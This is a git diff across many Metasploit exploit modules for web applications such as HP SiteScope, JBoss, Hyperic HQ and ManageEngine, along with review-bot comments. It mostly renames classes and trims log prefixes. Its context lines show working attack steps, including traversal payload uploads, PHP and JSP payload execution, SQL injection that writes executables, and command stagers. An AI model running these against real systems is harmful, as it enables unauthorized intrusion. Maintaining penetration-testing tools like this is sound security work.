diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 19cdc98388..1703db59af 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 2490945fbb..49ef2be08b 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index f8e6b61147..bc8becf8b6 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -93,11 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit if target.name =~ /Windows/ - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # cmd.exe max length is 8192 execute_cmdstager({:linemax => 8000, :nodelete => true}) elsif target.name =~ /Linux/ - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_command(payload.encoded, {:http_timeout => 1}) end end 
diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 7c5029cbf6..275271580a 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -88,15 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' # Create user with empty credentials - print_status("#{peer} - Creating user with empty credentials") + print_status("Creating user with empty credentials") if create_user.nil? - print_error("#{peer} - Failed to create user") + print_error("Failed to create user") return end # Generate an initial JSESSIONID - print_status("#{peer} - Retrieving an initial JSESSIONID") + print_status("Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' @@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else - print_error("#{peer} - Retrieve of initial JSESSIONID failed") + print_error("Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=&j_password=" - print_status("#{peer} - Authenticating on HP SiteScope Configuration") + print_status("Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'j_security_check'), 
@@ -129,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote session_id = $1 redirect = URI(res.headers['Location']).path else - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end # Follow redirection to complete authentication process - print_status("#{peer} - Following redirection to finish authentication") + print_status("Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote traversal = "..\\..\\..\\..\\..\\..\\" end - print_status("#{peer} - Uploading the payload") + print_status("Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", @@ -249,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - Payload successfully uploaded to #{path}") + print_good("Payload successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the Payload") + print_error("Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") - print_status("#{peer} - Uploading the JSP") + print_status("Uploading the JSP") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 
@@ -273,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - JSP successfully uploaded to #{path}") + print_good("JSP successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the JSP") + print_error("Error uploading the JSP") return end diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 9503af4d02..5ff5bc1d27 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager @@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + print_good("Logged in as '#{datastore['USERNAME']}'") end end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 6deb124231..bfcb22a5c5 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_warning("#{peer} - Could not access the script console") + print_warning("Could not access the script console") end if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") end end @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - vprint_status("#{peer} - Authenticating as '#{user}'") + vprint_status("Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - vprint_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("Authenticated successfully as '#{user}'") # check access to the console - vprint_status("#{peer} - Checking access to the script console") + vprint_status("Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if not @to_delete.nil? - print_warning("#{peer} - Deleting #{@to_delete} payload file") + print_warning("Deleting #{@to_delete} payload file") execute_command("rm #{@to_delete}") end end 
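Review bot: In hyperic_hq_script_console.rb hunk `@@ -94,12`, the `if not res or res.code != 200` branch only prints a warning and falls through, so the following `res.body =~ ...` raises NoMethodError when no response came back. Adding `return` after the `print_warning` leaves `@nonce` nil, which the check code in hunk `@@ -113,12` already tests with `@nonce.nil?`. The same nil dereference exists where hunk `@@ -126,7` reaches `elsif res.headers.include?('X-Jenkins')` after `if res and ...` has failed on a nil `res`. A guard placed right after `res = login(user, pass)`, `return Exploit::CheckCode::Unknown unless res`, would cover it. Both methods begin outside their hunks.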
@@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res and res.code == 200 and res.body =~ /Executed/ - vprint_good("#{peer} - Command executed successfully") + vprint_good("Command executed successfully") else fail_with(Failure::Unknown, "#{peer} - Failed to execute the command.") end # version 4.6.6 returns a new CSRF nonce in the response if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") # version 4.5.2 does not, so we request a new one else get_nonce @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") http_send_command(java_craft_runtime_exec(cmd)) end @@ -258,23 +258,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + print_good("Authenticated successfully as '#{user}'") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # check access to the console and get CSRF nonce - print_status("#{peer} - Checking access to the script console") + print_status("Checking access to the script console") get_nonce # check operating system if target.name =~ /Automatic/ - print_status("#{peer} - Trying to detect the remote target...") + print_status("Trying to detect the remote target...") @my_target = get_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to detect the remote target") else - print_good("#{peer} - #{@my_target.name} target found") + print_good("#{@my_target.name} target found") end else @my_target = target 
@@ -283,10 +283,10 @@ class Metasploit3 < Msf::Exploit::Remote # send payload case @my_target['Platform'] when 'win' - print_status("#{peer} - Sending command stager...") + print_status("Sending command stager...") execute_cmdstager({:linemax => 2049}) when 'unix' - print_status("#{peer} - Sending UNIX payload...") + print_status("Sending UNIX payload...") http_send_command(java_craft_runtime_exec(payload.encoded)) when 'linux' print_status("#{rhost}:#{rport} - Sending Linux stager...") diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 361c2c90ad..d95978ff4a 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0fc393a14e..bfe151d892 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5e8d269d03..e3ddeb488b 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } 
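Review bot: In hyperic_hq_script_console.rb hunk `@@ -283,10`, the `'linux'` branch still builds its own prefix, `print_status("#{rhost}:#{rport} - Sending Linux stager...")`, while the `'win'` and `'unix'` branches above it had theirs removed. If the print helpers now add the peer themselves, which is what the rest of this commit suggests, that line will show the address twice. `print_status("Sending Linux stager...")` would match its siblings. The `case` statement continues past the end of the hunk.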
diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 4b68cfdd07..c5380c9318 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 514a6a45b3..50f2944360 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index b8670c6052..779dd807da 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index d825a6f68f..10ca92c3c8 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 924d348356..b1a4cc705a 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index c047d6242c..624e5aa36b 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false + if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index ec577eb1d3..cbbf4c166a 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end 
@@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)") + print_status("Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 0365b344fc..45aba792cc 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 5360e33007..dac6cb7080 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| - print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + print_status("Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) - print_status("#{peer} - Requesting data.php") + print_status("Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 35b1b39b40..930d4b482a 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Automatic targeting failed.") else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote inject_exec(fullpath) register_file_for_cleanup(fullpath.sub('../','')) - print_status("#{peer} - Requesting #{jsp_name}") + print_status("Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri(jsp_name)}) end 
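Review bot: In log1cms_ajax_create_folder.rb hunk `@@ -82,14`, the context line `peer = "#{rhost}:#{rport}"` is left behind although neither `print_status` call in the hunk reads it any more. Unless code outside the hunk still uses it, the assignment is dead and can be dropped. Separately, `#{php.length.to_s}` can be `#{php.length}` because interpolation already calls `to_s`. The method starts and ends outside the hunk.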
@@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Selecting target, this might take a few seconds...") + print_status("Selecting target, this might take a few seconds...") rand_txt = rand_text_alpha_lower(8) << ".txt" paths = db_paths @@ -488,7 +488,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") + print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") if @my_target['Database'] == 'postgresql' inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'") @@ -528,12 +528,12 @@ class Metasploit3 < Msf::Exploit::Remote if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 if ver_gt(build, '80200') - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else - print_status("#{peer} - Detected Desktop Central v8 #{build} (MySQL)") + print_status("Detected Desktop Central v8 #{build} (MySQL)") end else - print_status("#{peer} - Detected Desktop Central v8 (MySQL)") + print_status("Detected Desktop Central v8 (MySQL)") end # DC v8 < 80200 uses the MySQL database Exploit::CheckCode::Appears @@ -542,7 +542,7 @@ class Metasploit3 < Msf::Exploit::Remote def check_desktop_central_9(body) if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 - print_status("#{peer} - Detected Desktop Central v9 #{build}") + print_status("Detected Desktop Central v9 #{build}") if ver_lt(build, '90039') return Exploit::CheckCode::Appears else 
@@ -565,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 uses the MySQL database - print_status("#{peer} - Detected Desktop Central v7 (MySQL)") + print_status("Detected Desktop Central v7 (MySQL)") return Exploit::CheckCode::Appears elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ @@ -600,17 +600,17 @@ class Metasploit3 < Msf::Exploit::Remote if ver_lt_eq(build, '6500') # if it's a build below 6500, it will only work if we have a JSP compiler - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") + print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") return Exploit::CheckCode::Detected elsif ver_lt(build, '6800') # PMP v6 < 6800 uses the MySQL database - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (MySQL)") + print_status("Detected Password Manager Pro v6 #{build} (MySQL)") return Exploit::CheckCode::Appears elsif ver_lt(build, '7003') - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") return Exploit::CheckCode::Appears else - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index ea739f7e8f..40cf9be0dd 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
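Review bot: In manage_engine_dc_pmp_sqli.rb hunk `@@ -600,17`, the `elsif ver_lt(build, '7003')` branch and the final `else` branch print the identical message `Detected Password Manager Pro v6 / v7 #{build}` but yield `Appears` and `Safe` respectively, so the output does not tell the operator which result was reached. A suffix on the second one would make the log unambiguous, for example `print_status("Detected Password Manager Pro v6 / v7 #{build} (not vulnerable)")`; the wording is only a suggestion. The final branch also relies on the implicit return value while the others use `return`, so `return Exploit::CheckCode::Safe` would be consistent. The method begins outside the hunk.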
@@ -365,9 +365,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end - print_status("#{peer} - Selecting target...") + print_status("Selecting target...") @my_target = pick_target - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 @@ -402,7 +402,7 @@ class Metasploit3 < Msf::Exploit::Remote # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) - print_status("#{peer} - Uploading bogus file...") + print_status("Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Failure::Unknown, "#{peer} - Bogus file upload failed") @@ -410,10 +410,10 @@ class Metasploit3 < Msf::Exploit::Remote end # Now send the actual payload - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else fail_with(Failure::Unknown, "#{peer} - EAR upload failed") end @@ -422,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' 
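Review bot: In manageengine_auth_upload.rb hunk `@@ -402,7`, `if res && res.code != 200` only fails on a non-200 reply, so a missing response (`res` nil, as other modules in this commit treat it) is silently counted as a successful bogus-file upload. The EAR upload in hunk `@@ -410,10` handles that case with `if res && res.code == 200 ... else fail_with(...)`. The same shape here would be `unless res && res.code == 200` in front of the existing `fail_with`. If a timeout is deliberately tolerated at this step, a comment saying so would help. The method starts and ends outside both hunks.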
diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index db8164c450..f975cd624b 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name) register_files_for_cleanup("Attachments/null/" + rand_file) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index a16088a0d2..cfc0508c60 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb index 48523cc5ef..29c7e6c2f5 100644 --- a/modules/exploits/multi/http/mantisbt_php_exec.rb +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb 
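Review bot: In manageengine_sd_uploader.rb hunk `@@ -116,7`, the status message is still assembled with `+` and an explicit `.to_s` across two lines. Interpolation says the same on one line: `print_status("Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")`. The surrounding `if` block continues outside the hunk.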
